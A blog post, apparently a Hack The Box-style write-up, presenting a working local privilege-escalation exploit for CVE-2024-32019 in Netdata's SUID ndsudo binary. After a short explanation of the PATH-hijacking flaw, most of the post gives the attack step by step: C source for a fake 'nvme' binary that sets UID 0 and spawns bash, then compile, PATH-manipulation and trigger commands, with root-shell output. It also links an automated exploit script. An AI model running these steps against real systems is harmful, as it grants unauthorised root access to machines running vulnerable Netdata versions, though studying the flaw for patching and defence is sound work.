CVE-2024-32019 - Netdata ndsudo PATH Vulnerability Exploit (LPE to Root)

CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root

Posted Aug 8, 2025

By dollarboysushil

1 min read

CVE-2024-32019 - Netdata ndsudo PATH Vulnerability Exploit (LPE to Root)

Summary

A Python-based exploit for CVE-2024-32019, a high-severity Local Privilege Escalation vulnerability in the Netdata Agent, leveraging a misconfigured SUID binary (ndsudo) that fails to securely handle the PATH environment variable.

[!Caution] This code is for educational and authorized testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal.

🔍 Overview

CVE ID: CVE-2024-32019
CVSS Score: 8.8 (High)
Disclosed: April 12, 2024
Component: Netdata Agent
Affected Versions:

>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169

🧠 Technical Summary

Netdata’s ndsudo tool is a SUID root binary intended to securely execute a limited set of system commands (like nvme) on behalf of non-root users.

However, due to an implementation flaw, it honors the user-controlled PATH variable when resolving command binaries. If an attacker can manipulate the PATH to include a writeable directory containing a malicious binary, ndsudo will execute it with root privileges — resulting in a local privilege escalation.

💥 Manual Exploitation Steps

The following steps demonstrate how to manually exploit the vulnerability in ndsudo.

1. Create a Privilege Escalation Binary

Save the following C code as nvme.c:

        
      
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

2. Compile the Exploit

gcc nvme.c -o nvme

3. Prepare the Exploit Environment on the Target

        
      
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme

4. Modify the `PATH`

        
      
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme

5. Trigger the Exploit

/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

If successful, you’ll get a root shell.

# whoami
root

Automatic Exploitation

Github Repo link https://github.com/dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

If you have ssh access, you can use CVE-2024-32019-dbs.py to automate this.

📎 References

Privilge Escalation, cve, CVE-2024-32019

editor htb linux ctf CVE-2024-32019 cve ndsudo exploit privilege escalation exploit

This post is licensed under CC BY 4.0 by the author.